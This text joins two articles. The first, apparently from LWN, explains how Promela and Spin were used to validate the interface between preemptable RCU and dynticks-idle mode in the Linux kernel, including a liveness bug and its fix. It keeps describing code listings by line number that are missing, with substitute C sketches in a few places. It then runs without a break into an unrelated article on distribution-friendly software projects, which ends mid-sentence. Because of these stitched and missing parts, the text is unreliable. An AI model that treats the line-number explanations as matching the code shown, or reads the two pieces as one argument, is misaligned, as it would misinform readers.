However, one disadvantage of the -rt implementation was that each grace period
required work to be done on each CPU, even if that CPU is in a low-power
“dynticks-idle” state,
and thus incapable of executing RCU read-side critical sections.
The idea behind the dynticks-idle state is that idle CPUs
should be physically powered down in order to conserve energy.
In short, preemptable RCU can disable a valuable energy-conservation
feature of recent Linux kernels.
Although Josh Triplett and Paul McKenney
had discussed some approaches for allowing
CPUs to remain in low-power state throughout an RCU grace period
(thus preserving the Linux kernel's ability to conserve energy), matters
did not come to a head until Steve Rostedt integrated a new dyntick
implementation with preemptable RCU in the -rt patchset.

This combination caused one of Steve's systems to hang on boot, so in
October, Paul coded up a dynticks-friendly modification to preemptable RCU's
grace-period processing.
Steve coded up rcu_irq_enter() and rcu_irq_exit()
interfaces called from the
irq_enter() and irq_exit() interrupt
entry/exit functions.
These rcu_irq_enter() and rcu_irq_exit()
functions are needed to allow RCU to reliably handle situations where
a dynticks-idle CPU is momentarily powered up for an interrupt
handler containing RCU read-side critical sections.
With these changes in place, Steve's system booted reliably,
but Paul continued inspecting the code periodically on the assumption
that we could not possibly have gotten the code right on the first try.

Paul reviewed the code repeatedly from October 2007 to February 2008,
and almost always found at least one bug.
In one case, Paul even coded and tested a fix before realizing that the
bug was illusory; indeed, in every case the “bug” turned out to be
illusory.

Near the end of February, Paul grew tired of this game.
He therefore decided to enlist the aid of
Promela and Spin,
as described in the LWN article
"Using Promela and Spin to verify parallel algorithms."
This article presents a series of seven increasingly realistic
Promela models, the last of which passes, consuming about
40GB of main memory for the state space.


Quick Quiz 1:
Yeah, that's great!!!
Now, just what am I supposed to do if I don't happen to have a machine with
40GB of main memory???

More important, Promela and Spin did find a very subtle bug for me!!!


This article is organized as follows:


Introduction to Preemptable RCU and dynticks
    Task Interface
    Interrupt Interface
    Grace-Period Interface
Validating Preemptable RCU and dynticks
    Basic Model
    Validating Safety
    Validating Liveness
    Interrupts
    Validating Interrupt Handlers
    Validating Nested Interrupt Handlers
    Validating NMI Handlers


These sections are followed by
conclusions and
answers to the Quick Quizzes.


Introduction to Preemptable RCU and dynticks
The per-CPU dynticks_progress_counter variable is
central to the interface between dynticks and preemptable RCU.
This variable has an even value whenever the corresponding CPU
is in dynticks-idle mode, and an odd value otherwise.
A CPU exits dynticks-idle mode for the following three reasons:


	to start running a task,
	when entering the outermost of a possibly nested set of interrupt
	handlers, and
	when entering an NMI handler.

Preemptable RCU's grace-period machinery samples the value of
the dynticks_progress_counter variable in order to
determine when a dynticks-idle CPU may safely be ignored.

The following three sections give an overview of the task
interface, the interrupt/NMI interface, and the use of
the dynticks_progress_counter variable by the
grace-period machinery.


Task Interface
When a given CPU enters dynticks-idle mode because it has no more
tasks to run, it invokes rcu_enter_nohz():


This function simply increments dynticks_progress_counter and
checks that the result is even, but first executes a memory barrier
to ensure that any other CPU that sees the new value of
dynticks_progress_counter will also see the completion
of any prior RCU read-side critical sections.

Similarly, when a CPU that is in dynticks-idle mode prepares to
start executing a newly runnable task, it invokes
rcu_exit_nohz():


This function again increments dynticks_progress_counter,
but follows it with a memory barrier to ensure that if any other CPU
sees the result of any subsequent RCU read-side critical section,
then that other CPU will also see the incremented value of
dynticks_progress_counter.
Finally, rcu_exit_nohz() checks that the result of the
increment is an odd value.

The rcu_enter_nohz() and rcu_exit_nohz()
functions handle the case where a CPU enters and exits dynticks-idle
mode due to task execution, but do not handle interrupts, which are
covered in the following section.
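As a rough illustration, the even/odd discipline described above can be modeled in user-space C.  This is a single-threaded sketch rather than the kernel code: the model_ names are invented here, a plain global stands in for the per-CPU variable, assert() stands in for the kernel's warning check, and the C11 fence merely marks where the kernel's memory barrier sits.

```c
#include <assert.h>
#include <stdatomic.h>

/* One simulated CPU's counter: even = dynticks-idle, odd = not idle. */
static long dynticks_progress_counter;

/* Entering dynticks-idle mode: barrier first, then increment to even. */
static void model_rcu_enter_nohz(void)
{
    atomic_thread_fence(memory_order_seq_cst);  /* stand-in for the barrier */
    dynticks_progress_counter++;
    assert((dynticks_progress_counter & 0x1) == 0);
}

/* Leaving dynticks-idle mode: increment to odd, then barrier. */
static void model_rcu_exit_nohz(void)
{
    dynticks_progress_counter++;
    atomic_thread_fence(memory_order_seq_cst);  /* stand-in for the barrier */
    assert((dynticks_progress_counter & 0x1) == 1);
}

/* Nonzero if the counter says this CPU is in dynticks-idle mode. */
static int model_cpu_is_idle(void)
{
    return (dynticks_progress_counter & 0x1) == 0;
}
```

The ordering of the barrier relative to the increment is the point of the sketch: on entry the barrier comes first, so prior read-side critical sections are visible before the even value is; on exit it comes second, so the odd value is visible before any later critical section.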


Interrupt Interface
The rcu_irq_enter() and rcu_irq_exit()
functions handle interrupt/NMI entry and exit, respectively.
Of course, nested interrupts must also be properly accounted for.
The possibility of nested interrupts is handled by a second per-CPU
variable, rcu_update_flag, which is incremented upon
entry to an interrupt or NMI handler (in rcu_irq_enter())
and is decremented upon exit (in rcu_irq_exit()).
In addition, the pre-existing in_interrupt() primitive is
used to distinguish between an outermost or a nested interrupt/NMI.

Interrupt entry is handled by the rcu_irq_enter()
function shown below:


Quick Quiz 2:
Why not simply increment rcu_update_flag, and then only
increment dynticks_progress_counter if the old value
of rcu_update_flag was zero???

Quick Quiz 3:
But if line 7 finds that we are the outermost interrupt, wouldn't
we always need to increment dynticks_progress_counter?

Line 3 fetches the current CPU's number, while lines 4 and 5
increment the rcu_update_flag nesting counter if it
is already non-zero.
Lines 6 and 7 check to see whether we are the outermost level of
interrupt, and, if so, whether dynticks_progress_counter
needs to be incremented.
If so, line 9 increments dynticks_progress_counter,
line 10 executes a memory barrier, and line 11 increments
rcu_update_flag.
As with rcu_exit_nohz(), the memory barrier ensures that
any other CPU that sees the effects of an RCU read-side critical section
in the interrupt handler (following the rcu_irq_enter()
invocation) will also see the increment of
dynticks_progress_counter.


Interrupt exit is handled similarly by
rcu_irq_exit():


Line 3 fetches the current CPU's number, as before.
Line 5 checks to see if the rcu_update_flag is
non-zero, returning immediately (via falling off the end of the
function) if not.
Otherwise, lines 6 through 11 come into play.
Line 6 decrements rcu_update_flag, returning
if the result is not zero.
Line 8 verifies that we are indeed leaving the outermost
level of nested interrupts, line 9 executes a memory barrier,
line 10 increments dynticks_progress_counter,
and line 11 verifies that this variable is now even.
As with rcu_enter_nohz(), the memory barrier ensures that
any other CPU that sees the increment of
dynticks_progress_counter
will also see the effects of an RCU read-side critical section
in the interrupt handler (preceding the rcu_irq_exit()
invocation).
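The entry and exit logic described in this section can be approximated by the following single-threaded user-space sketch.  It is not the kernel listing that the line numbers in the text refer to: the model_ names and the irq_depth variable (a stand-in for in_interrupt()) are assumptions made for illustration, and assert() replaces the kernel's warning checks.

```c
#include <assert.h>
#include <stdatomic.h>

static long dynticks_progress_counter;  /* even = dynticks-idle */
static int rcu_update_flag;             /* nesting count while RCU tracks irqs */
static int irq_depth;                   /* hypothetical stand-in for in_interrupt() */

static void model_rcu_irq_enter(void)
{
    if (rcu_update_flag)
        rcu_update_flag++;              /* already tracking: count the nesting */
    if (irq_depth == 0 && (dynticks_progress_counter & 0x1) == 0) {
        dynticks_progress_counter++;    /* outermost irq on an idle CPU: go odd */
        atomic_thread_fence(memory_order_seq_cst);
        rcu_update_flag++;
    }
}

static void model_rcu_irq_exit(void)
{
    if (rcu_update_flag) {
        if (--rcu_update_flag)
            return;                     /* still inside a nested handler */
        assert(irq_depth == 0);         /* must be leaving the outermost level */
        atomic_thread_fence(memory_order_seq_cst);
        dynticks_progress_counter++;    /* back to dynticks-idle: go even */
        assert((dynticks_progress_counter & 0x1) == 0);
    }
}

/* Hypothetical wrappers that maintain the nesting depth around the hooks. */
static void model_irq_enter(void) { model_rcu_irq_enter(); irq_depth++; }
static void model_irq_exit(void)  { irq_depth--; model_rcu_irq_exit(); }
```

Starting from an idle CPU, two nested calls to model_irq_enter() followed by two calls to model_irq_exit() move the counter from 0 to 1 and then to 2; a CPU that was already non-idle (odd counter) passes through with neither variable changing.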

These two sections have described how the
dynticks_progress_counter variable is maintained during
entry to and exit from dynticks-idle mode, both by tasks and by
interrupts and NMIs.
The following section describes how this variable is used by
preemptable RCU's grace-period machinery.


Grace-Period Interface
Of the four preemptable RCU grace-period states shown below
(taken from 
The Design of Preemptable Read-Copy Update),
only the rcu_try_flip_waitack_state()
and rcu_try_flip_waitmb_state() states need to wait
for other CPUs to respond.


Of course, if a given CPU is in dynticks-idle state, we shouldn't
wait for it.
Therefore, just before entering one of these two states,
the preceding state takes a snapshot of each CPU's
dynticks_progress_counter variable, placing the
snapshot in another per-CPU variable,
rcu_dyntick_snapshot.
This is accomplished by invoking
dyntick_save_progress_counter(), shown below:


The rcu_try_flip_waitack_state() state invokes
rcu_try_flip_waitack_needed(), shown below:
 

Lines 7 and 8 pick up current and snapshot versions of
dynticks_progress_counter, respectively.
The memory barrier that follows these fetches ensures that the counter checks
in the later rcu_try_flip_waitzero_state follow
the fetches of these counters.
Lines 10 and 11 return zero (meaning no communication with the
specified CPU is required) if that CPU has remained in dynticks-idle
state since the time that the snapshot was taken.
Similarly, lines 12 and 13 return zero if that CPU was initially
in dynticks-idle state or if it has completely passed through a
dynticks-idle state.
In both these cases, there is no way that that CPU could have retained
the old value of the grace-period counter.
If neither of these conditions holds, line 14 returns one, meaning
that the CPU needs to explicitly respond.

For its part, the rcu_try_flip_waitmb_state state
invokes rcu_try_flip_waitmb_needed(), shown below:


This is quite similar to rcu_try_flip_waitack_needed(),
the difference being in lines 12 and 13, because any transition
either to or from dynticks-idle state executes the memory barrier
needed by the rcu_try_flip_waitmb_state() state.
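The two checks can be written as pure functions of the current and snapshot counter values, which makes the cases easier to compare.  The sketch below mirrors the prose of this section and nothing more: the model_ names are invented, the memory barrier is omitted, the "> 2" threshold for "completely passed through" is an assumption, and no claim is made that the logic is bug-free (Quick Quiz 4 invites exactly that question).

```c
#include <assert.h>

/* Nonzero if a counter value denotes dynticks-idle mode (even value). */
static int model_is_idle_value(long v)
{
    return (v & 0x1) == 0;
}

/* Does the grace-period code need an explicit acknowledgment from this CPU? */
static int model_waitack_needed(long curr, long snap)
{
    assert(curr >= snap);       /* the counter only increases (wraparound ignored) */
    if (curr == snap && model_is_idle_value(curr))
        return 0;               /* stayed in dynticks-idle since the snapshot */
    if ((curr - snap) > 2 || model_is_idle_value(snap))
        return 0;               /* passed through idle, or was idle at snapshot */
    return 1;                   /* the CPU must respond explicitly */
}

/* Does the grace-period code need this CPU to execute a memory barrier? */
static int model_waitmb_needed(long curr, long snap)
{
    assert(curr >= snap);
    if (curr == snap && model_is_idle_value(curr))
        return 0;               /* stayed in dynticks-idle since the snapshot */
    if (curr != snap)
        return 0;               /* any transition already executed a barrier */
    return 1;
}
```

The only difference between the two functions is the second test, which is weaker in the memory-barrier case because a single transition in either direction is enough.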


Quick Quiz 4:
Can you spot any bugs in any of the code in this section?

We now have seen all the code involved in the interface between
RCU and the dynticks-idle state.
The next section builds up the Promela model used to validate this
code.


Validating Preemptable RCU and dynticks
This section develops a Promela model for the interface between
dynticks and RCU step by step, with each of the following sections
illustrating one step, starting with the process-level code,
adding assertions, interrupts, and finally NMIs.


Basic Model
This section translates the process-level dynticks entry/exit
code and the grace-period processing into
Promela.
We start with rcu_exit_nohz() and
rcu_enter_nohz()
from the 2.6.25-rc4 kernel, placing these in a single Promela
process that models exiting and entering dynticks-idle mode in
a loop as follows:


Lines 6 and 20 define a loop.
Line 7 exits the loop once the loop counter i
has exceeded the limit MAX_DYNTICK_LOOP_NOHZ.
Line 8 tells the loop construct to execute lines 9-19
for each pass through the loop.
Because the conditionals on lines 7 and 8 are exclusive of
each other, the normal Promela random selection of true conditions
is disabled.
Lines 9 and 11 model rcu_exit_nohz()'s non-atomic
increment of dynticks_progress_counter, while
line 12 models the WARN_ON().
The atomic construct simply reduces the Promela state space,
given that the WARN_ON() is not strictly speaking part
of the algorithm.
Lines 14-18 similarly model the increment and
WARN_ON() for rcu_enter_nohz().
Finally, line 19 increments the loop counter.


Quick Quiz 5:
Why isn't the memory barrier in rcu_exit_nohz()
and rcu_enter_nohz() modeled in Promela?

Quick Quiz 6:
Isn't it a bit strange to model rcu_exit_nohz()
followed by rcu_enter_nohz()?
Wouldn't it be more natural to instead model entry before exit?

Each pass through the loop therefore models a CPU exiting
dynticks-idle mode (for example, starting to execute a task), then
re-entering dynticks-idle mode (for example, that same task blocking).
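For readers without the Promela listing at hand, the shape of this loop can be approximated in C.  This is a sketch only: the loop limit is an assumed value, the function name is invented, and a single-threaded C program cannot explore the interleavings that Spin checks.  What it does show is the non-atomic increment modeled as a separate read and write, with a parity check after each step.

```c
#include <assert.h>

#define MAX_DYNTICK_LOOP_NOHZ 3     /* assumed loop limit for this sketch */

static long dynticks_progress_counter;  /* even = dynticks-idle */

/* One simulated CPU repeatedly exiting and re-entering dynticks-idle mode. */
static void model_dyntick_nohz(void)
{
    long tmp;
    int i = 0;

    while (i < MAX_DYNTICK_LOOP_NOHZ) {
        /* rcu_exit_nohz(): read, then write back the incremented value. */
        tmp = dynticks_progress_counter;
        dynticks_progress_counter = tmp + 1;
        assert((dynticks_progress_counter & 1) == 1);

        /* rcu_enter_nohz(): the same non-atomic increment, now to even. */
        tmp = dynticks_progress_counter;
        dynticks_progress_counter = tmp + 1;
        assert((dynticks_progress_counter & 1) == 0);

        i++;
    }
}
```

In the Promela model, another process may run between the read and the write of each increment; that gap is the reason the increment is split in two.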


The next step is to model the interface to RCU's grace-period
processing.
For this, we need to model
dyntick_save_progress_counter(),
rcu_try_flip_waitack_needed(),
rcu_try_flip_waitmb_needed(),
as well as portions of
rcu_try_flip_waitack() and
rcu_try_flip_waitmb(), all from the 2.6.25-rc4 kernel.
The following grace_period() Promela process models
these functions as they would be invoked during a single pass
through preemptable RCU's grace-period processing.


Lines 6-9 print out the loop limit (but only into the .trail file
in case of error) and model a line of code
from rcu_try_flip_idle() and its call to
dyntick_save_progress_counter(), which takes a
snapshot of the current CPU's dynticks_progress_counter
variable.
These two lines are executed atomically to reduce state space.

Lines 10-22 model the relevant code in
rcu_try_flip_waitack() and its call to
rcu_try_flip_waitack_needed().
This loop is modeling the grace-period state machine waiting for
a counter-flip acknowledgment from each CPU, but only that part
that interacts with dynticks-idle CPUs.

Line 23 models a line from rcu_try_flip_waitzero()
and its call to dyntick_save_progress_counter(), again
taking a snapshot of the CPU's dynticks_progress_counter
variable.

Finally, lines 24-36 model the relevant code in
rcu_try_flip_waitmb() and its call to
rcu_try_flip_waitmb_needed().
This loop is modeling the grace-period state-machine waiting for
each CPU to execute a memory barrier, but again only that part
that interacts with dynticks-idle CPUs.


Quick Quiz 7:
Wait a minute!
In the Linux kernel, both dynticks_progress_counter and
rcu_dyntick_snapshot are per-CPU variables.
So why are they instead being modeled as single global variables?

The resulting model, when run with the runspin.sh script,
generates 691 states and
passes without errors, which is not at all surprising given that
it completely lacks the assertions that could find failures.
The next section therefore adds safety assertions.


Validating Safety
A safe RCU implementation must never permit a grace period to
complete before the completion of any RCU readers that started
before the start of the grace period.
This is modeled by a grace_period_state variable that
can take on three states as follows:
 

The grace_period() process sets this variable as it
progresses through the grace-period phases, as shown below:


Quick Quiz 8:
Given there are a pair of back-to-back changes to
grace_period_state on lines 25 and 26,
how can we be sure that line 25's changes won't be lost?


Lines 6, 10, 25, 26, 29, and 44 update this variable (combining
atomically with algorithmic operations where feasible) to
allow the dyntick_nohz() process to validate the basic
RCU safety property.
The form of this validation is to assert that the value of the
grace_period_state variable cannot jump from
GP_IDLE to GP_DONE during a time period
over which RCU readers could plausibly persist.


The dyntick_nohz() Promela process implements
this validation as shown below:


Line 13 sets a new old_gp_idle flag if the
value of the grace_period_state variable is
GP_IDLE at the beginning of task execution,
and the assertion at line 18 fires if the grace_period_state
variable has advanced to GP_DONE during task execution,
which would be illegal given that a single RCU read-side critical
section could span the entire intervening time period.
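The check just described can also be sketched outside of Promela. The Python fragment below is only an illustration, not the model itself: the numeric values, the helper name reader_window_is_safe(), and the GP_WAITING name for the intermediate state are assumptions made for this sketch (the text names only GP_IDLE and GP_DONE).

```python
# Illustrative sketch only; values and helper name are assumptions.
GP_IDLE = 0
GP_WAITING = 1  # assumed name for the intermediate state
GP_DONE = 2


def reader_window_is_safe(state_at_start, state_at_end):
    """Return False if a grace period went from idle to done while a
    single RCU reader could have been running the whole time."""
    old_gp_idle = (state_at_start == GP_IDLE)
    return not (old_gp_idle and state_at_end == GP_DONE)


# A grace period that has merely started is fine; one that has also
# completed during the same window violates the safety property.
assert reader_window_is_safe(GP_IDLE, GP_WAITING)
assert not reader_window_is_safe(GP_IDLE, GP_DONE)
```

The sketch checks only the start and end of one window, which is the same shape as sampling the variable at the beginning of task execution and asserting on it later.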

The resulting
model,
when run with the runspin.sh script,
generates 964 states and passes without errors, which is reassuring.
That said, although safety is critically important, it is also quite
important to avoid indefinitely stalling grace periods.
The next section therefore covers validating liveness.


Validating Liveness
Although liveness can be difficult to prove, there is a simple
trick that applies here.
The first step is to make dyntick_nohz() indicate that
it is done via a dyntick_nohz_done variable, as shown on
line 26 of the following:
 

With this variable in place, we can add assertions to
grace_period() to check for unnecessary blockage
as follows:
 

We have added the shouldexit variable on line 5,
which we initialize to zero on line 10.
Line 17 asserts that shouldexit is not set, while
line 18 sets shouldexit to the dyntick_nohz_done
variable maintained by dyntick_nohz().
This assertion will therefore trigger if we attempt to take more than
one pass through the wait-for-counter-flip-acknowledgment
loop after dyntick_nohz() has completed
execution.
After all, if dyntick_nohz() is done, then there cannot be
any more state changes to force us out of the loop, so going through twice
in this state means an infinite loop, which in turn means no end to the
grace period.
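The shouldexit trick can be illustrated with a small Python sketch. This is a simplified stand-in for the Promela loop, not a transcription of it: the function name wait_loop() and the representation of each pass as a pair of observations are assumptions made here for illustration.

```python
def wait_loop(observations):
    """Walk through successive passes of a wait loop.

    Each observation is a pair (must_keep_waiting, other_process_done).
    An AssertionError is raised if another pass is attempted after the
    other process was already seen to be done, because nothing could
    then change the loop condition.  Returns the number of passes taken.
    """
    shouldexit = False
    passes = 0
    for must_keep_waiting, other_done in observations:
        if not must_keep_waiting:
            break
        assert not shouldexit, "still looping after the other process finished"
        shouldexit = other_done
        passes += 1
    return passes
```

A pass that observes the other process as done is permitted; it is the following pass, taken with nothing left to change the state, that trips the assertion.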

Lines 32, 39, and 40 operate in a similar manner for the
second (memory-barrier) loop.

However, running this
model
results in failure, as line 23 is checking that the wrong variable
is even.
Upon failure, spin writes out a
“trail”
file, which records the sequence of states that lead to the failure.
Use the spin -t -p -g -l dyntickRCU-base-sl-busted.spin
command to cause spin to retrace this sequence of states,
printing the statements executed and the values of variables.
Note that the line numbers do not match the listing above due to
the fact that spin takes both functions in a single file.
However, the line numbers do match the full model.

We see that the dyntick_nohz() process completed
at step 34 (search for “34:”), but that the
grace_period() process nonetheless failed to exit the loop.
The value of curr is 6 (see step 35)
and the value of snap is 5 (see step 17).
Therefore the first condition on line 21 above does not hold because
curr != snap, and the second condition on line 23
does not hold either because snap is odd and because
curr is only one greater than snap.

So one of these two conditions has to be incorrect.
Referring to the comment block in rcu_try_flip_waitack_needed()
for the first condition:


The first condition does match this, because if curr == snap
and if curr is even, then the corresponding CPU has been
in dynticks-idle mode the entire time, as required.
So let's look at the comment block for the second condition:


The first part of the condition is correct, because if curr
and snap differ by two, there will be at least one even
number in between, corresponding to having passed completely through
a dynticks-idle phase.
However, the second part of the condition corresponds to having
started in dynticks-idle mode, not having finished
in this mode.
We therefore need to be testing curr rather than
snap for being an even number.
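The failing case can be replayed with a short Python sketch of the two tests. The function names are hypothetical, and the exact form of the difference test (curr - snap greater than 2) is an assumption of this sketch; the only difference between the two versions is which variable is tested for evenness.

```python
def ack_needed_buggy(curr, snap):
    """Version that tests snap for evenness (the bug)."""
    if curr == snap and curr % 2 == 0:
        return False  # CPU stayed in dynticks-idle mode throughout
    if (curr - snap) > 2 or snap % 2 == 0:
        return False
    return True  # keep waiting for an explicit acknowledgment


def ack_needed_fixed(curr, snap):
    """Version that tests curr for evenness."""
    if curr == snap and curr % 2 == 0:
        return False
    if (curr - snap) > 2 or curr % 2 == 0:
        return False
    return True


# Values from the failing trace: curr is 6 and snap is 5.
print(ack_needed_buggy(6, 5), ack_needed_fixed(6, 5))
```

With these values the first version keeps demanding an acknowledgment that can never arrive, while the second recognizes that the CPU finished in dynticks-idle mode.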

The corrected C code is as follows:
 

Making the corresponding correction in the
model
results in a correct validation with 661 states that passes without
errors.
However, it is worth noting that the first version of the liveness
validation failed to catch this bug, due to a bug in the liveness
validation itself.
This liveness-validation bug was located by inserting an infinite
loop in the grace_period() process, and noting that
the liveness-validation code failed to detect this problem!

We have now successfully validated both safety and liveness
conditions, but only for processes running and blocking.
We also need to handle interrupts, a task taken up in the next section.


Interrupts
There are a couple of ways to model interrupts in Promela:

	using C-preprocessor tricks to insert the interrupt handler
	between each and every statement of the dyntick_nohz()
	process, or
	modeling the interrupt handler with a separate process.

A bit of thought indicated that the second approach would have a
smaller state space, though it requires that the interrupt handler
somehow run atomically with respect to the dyntick_nohz()
process, but not with respect to the grace_period()
process.

Fortunately, it turns out that Promela permits you to branch
out of atomic statements.
This trick allows us to have the interrupt handler set a flag, and
recode dyntick_nohz() to atomically check this flag
and execute only when the flag is not set.
This can be accomplished with a C-preprocessor macro that takes
a label and a Promela statement as follows:


One might use this macro as follows:

Line 2 of the macro creates the specified statement label.
Lines 3-8 are an atomic block that tests the in_dyntick_irq
variable, and if this variable is set (indicating that the interrupt
handler is active), branches out of the atomic block back to the
label.
Otherwise, line 6 executes the specified statement.
The overall effect is that mainline execution stalls any time an interrupt
is active, as required.
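The gating behavior can be mimicked in a few lines of Python. This is a single-threaded illustration under stated assumptions, not a rendering of the macro: the State class, execute_mainline(), and bump() are names invented for this sketch, and the atomicity of "test the flag, then run the statement" holds here only because nothing else runs in between.

```python
class State:
    def __init__(self):
        self.in_dyntick_irq = False  # set while the interrupt handler runs
        self.counter = 0             # stand-in for mainline-visible state


def execute_mainline(state, stmt):
    """Attempt one mainline statement.

    Returns True if stmt ran, or False if the interrupt handler was
    active and the caller must retry later (the analogue of branching
    back to the label).
    """
    if state.in_dyntick_irq:
        return False
    stmt(state)
    return True


def bump(state):
    state.counter += 1


s = State()
s.in_dyntick_irq = True
assert execute_mainline(s, bump) is False  # stalled: handler is active
s.in_dyntick_irq = False
assert execute_mainline(s, bump) is True   # handler done: statement runs
```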


Validating Interrupt Handlers
The first step is to convert dyntick_nohz() to
EXECUTE_MAINLINE() form, as follows:


Quick Quiz 9:
But what would you do if you needed the statements in a single
EXECUTE_MAINLINE() group to execute non-atomically?

Quick Quiz 10:
But what if the dyntick_nohz() process had “if”
or “do”
statements with conditions, where the statement bodies of these constructs
needed to execute non-atomically?


It is important to note that when a group of statements is passed
to EXECUTE_MAINLINE(), as in lines 11-14, all
statements in that group execute atomically.


The next step is to write a dyntick_irq() process
to model an interrupt handler:


Quick Quiz 11:
Why are lines 44 and 45 (the in_dyntick_irq = 0;
and the i++;) executed atomically?

Quick Quiz 12:
What property of interrupts is this dyntick_irq() process
unable to model?

The loop from lines 7-47 models up to MAX_DYNTICK_LOOP_IRQ
interrupts, with lines 8 and 9 forming the loop condition and line 45
incrementing the control variable.
Line 10 tells dyntick_nohz() that an interrupt handler
is running, and line 44 tells dyntick_nohz() that this
handler has completed.
Line 48 is used for liveness validation, much as is the corresponding
line of dyntick_nohz().


Lines 11-24 model rcu_irq_enter(), and
lines 25 and 26 model the relevant snippet of __irq_enter().
Lines 27 and 28 validate safety in much the same manner as do the
corresponding lines of dyntick_nohz().
Lines 29 and 30 model the relevant snippet of __irq_exit(),
and finally lines 31-42 model rcu_irq_exit().


The implementation of grace_period() is very similar
to the earlier one.
The only changes are the addition of line 10 to add the new
interrupt-count parameter and changes to lines 19 and 41 to
add the new dyntick_irq_done variable to the liveness
checks.

This model
results in a correct validation with roughly half a million
states, passing without errors.
However, this version of the model does not handle nested
interrupts.
This topic is taken up in the next section.


Validating Nested Interrupt Handlers
Nested interrupt handlers may be modeled by splitting the body of
the loop in dyntick_irq() as follows:


This is similar to the earlier dyntick_irq() process.
It adds a second counter variable j on line 5, so that
i counts entries to interrupt handlers and j
counts exits.
The outermost variable on line 7 helps determine
when the grace_period_state variable needs to be sampled
for the safety checks.
The loop-exit check on line 10 is updated to require that the
specified number of interrupt handlers are exited as well as entered,
and the increment of i is moved to line 39, which is
the end of the interrupt-entry model.
Lines 12-15 set the outermost variable to indicate
whether this is the outermost of a set of nested interrupts and to
set the in_dyntick_irq variable that is used by the
dyntick_nohz() process.
Lines 32-37 capture the state of the grace_period_state
variable, but only when in the outermost interrupt handler.

Line 40 has the do-loop conditional for interrupt-exit modeling:
as long as we have exited fewer interrupts than we have entered, it is
legal to exit another interrupt.
Lines 41-48 check the safety criterion, but only if we are exiting
from the outermost interrupt level.
Finally, lines 63-66 increment the interrupt-exit count j
and, if this is the outermost interrupt level, clear
in_dyntick_irq.

This model
results in a correct validation with a bit more than half a million
states, passing without errors.
However, this version of the model does not handle NMIs,
which are taken up in the next section.


Validating NMI Handlers
We take the same general approach for NMIs as we do for interrupts,
keeping in mind that NMIs do not nest.
This results in a dyntick_nmi() process as follows:


Of course, the fact that we have NMIs requires adjustments in
the other components.
For example, the EXECUTE_MAINLINE() macro now needs to
pay attention to the NMI handler as well
as the interrupt handler by checking
the in_dyntick_nmi variable in addition to in_dyntick_irq, as follows:


We will also need to introduce an EXECUTE_IRQ()
macro that checks in_dyntick_nmi in order to allow
dyntick_irq() to exclude dyntick_nmi():


It is further necessary to convert dyntick_irq()
to EXECUTE_IRQ() as follows:


Note that we have open-coded the “if” statements
(for example, lines 16-28).
In addition, statements that process strictly local state
(such as line 56) need not exclude dyntick_nmi().

Finally, grace_period() requires only a few changes:


We have added the printf() for the new
MAX_DYNTICK_LOOP_NMI parameter on line 11 and
added dyntick_nmi_done to the shouldexit
assignments on lines 22 and 46.


Quick Quiz 13:
Do you always write your code in this painfully incremental manner???

The model
results in a correct validation with several hundred million
states, passing without errors.


Conclusions
This effort provided some lessons (re)learned:

Promela and spin can validate interrupt/NMI-handler
interactions.

Documenting code can help locate bugs.
In this case, the documentation effort located
this bug.

Validate your code early, often, and up to the point
of destruction.
This effort located one subtle
bug
that might have been quite difficult to test or debug.

Always validate your validation code.
The usual way to do this is to insert a deliberate bug
and verify that the validation code catches it.  Of course,
if the validation code fails to catch this bug, you may also
need to verify the bug itself, and so on, recursing infinitely.
However, if you find yourself in this position,
getting a good night's sleep
can be an extremely effective debugging technique.

Finally, if cmpxchg instructions ever become
inexpensive enough to tolerate them in the interrupt fastpath, their use
could greatly simplify this code.
The Promela model for an atomic-instruction-based implementation of
this code has more than an order of magnitude fewer states, and the
C code is much easier to understand.
On the other hand, one must take care when using cmpxchg
instructions, as some code sequences, if highly contended, can result
in starvation.
This situation is particularly likely to occur when part of the
algorithm uses cmpxchg, other parts of the algorithm
use atomic instructions that cannot fail (e.g., atomic increment),
contention for the variable in question is high, and the code is
running on a NUMA or a shared-cache machine.
Sadly, almost all multi-socket systems with either multi-core or
multi-threaded CPUs fit this description.

Acknowledgments
We are indebted to Andrew Theurer, who maintains the large-memory machine
that ran the full test.
We all owe a debt of gratitude to Vara Prasad for his help in rendering
this article human-readable.


		Distribution-friendly projects Part 3


[Editor's note: This article, which looks at the interactions of software
projects and distribution providers, is presented in three parts. Part 1 introduces the issues downstream
distributions have with upstream software providers.  Part 2 covers the technical needs of the
distributions.]

Philosophical requests

The philosophical side of packaging is mostly of concern to the users,
although the global goals of the distribution will have some philosophical
issues as well.  In this section I'll try to cover the most common requests
of the downstream distributions to the various upstream providers.

Technical requests can usually be taken care of with compromises and
options at build-time, so a solution will usually be found in time.
Philosophical needs, on the other hand, often put distributions and
original developers in two opposing positions, and cannot be resolved unless
one of the two accepts the position of the other.

While technical needs are usually shared between distributions,
different distributions have different goals, and in turn different
philosophical needs, and this adds to the problem. A project wanting
to accommodate the requests from one distribution might make life more
difficult for another that has different philosophical needs.

User expectations

Users of a distribution usually expect a
certain behaviour from the software they install. For graphical
applications, they also might expect a certain graphical aspect so
that all the applications blend in together. These problems may be
easier to solve as non-technical concerns go, as they usually require
providing more choices.

One common example comes with fonts in graphical environments: most
distributions these days ship with all the graphical applications set to
use the same font family. This is done to follow the style rule of
using as few different fonts in a single view as possible (you don't
usually see a book using ten or twelve different fonts in the
text). So one common request is for software to provide a way to
change the default font without user intervention (which otherwise
often involves changing the source code).

This still seems to be a technical issue; for example, using TrueType fonts
requires the use of some sophisticated libraries for font rendering.  Some
projects don't want to complicate their code with them. Similarly, some
distributions like to provide anti-aliasing for the default fonts, but some
projects dislike the whole idea of using anti-aliased fonts.

A similar issue might arise with GUI toolkits. Distributions tend to
provide the same graphical aspect for the software they install; this
usually means that both GTK+ and Qt are set to similar, if not
identical, themes. So one other thing distributions might like is for
graphical software to rely on a theme-capable toolkit. Themes and
skins, though, are often disliked by minor projects, which might also
not be using the GTK+ or Qt toolkits, as they tend to make the code more
complex and slow.

Users expect to be able to set their language preference and to have all
applications use that language.  Unfortunately adding support for
translations is a far from trivial task, and adds complexity to the
software, which is something that especially smaller software projects try
to avoid.  Similar complexity also stems from supporting text
encodings like UTF-8, which - for certain distributions like Fedora -
is a prerequisite for the software to be added to their repository.

It's easy to see that user requests are often pretty complex and hard
to implement on many existing projects. The best way to make a
project more appealing for distributions is to start from the
beginning with these points in mind.

Distribution philosophical policies

There are also
distribution policies regarding issues that are simply
philosophical. In this category you can find the requests of distributions
for removing code that deals with non-free formats, like most multimedia
formats. All these issues are usually centered around licensing, copyright
and patent-encumbered formats or algorithms:


 Multimedia formats (video, audio or picture formats)
are often considered patent-encumbered (sometimes with the exception of
Xiph formats like Ogg, Vorbis and Theora).  For this reason, most
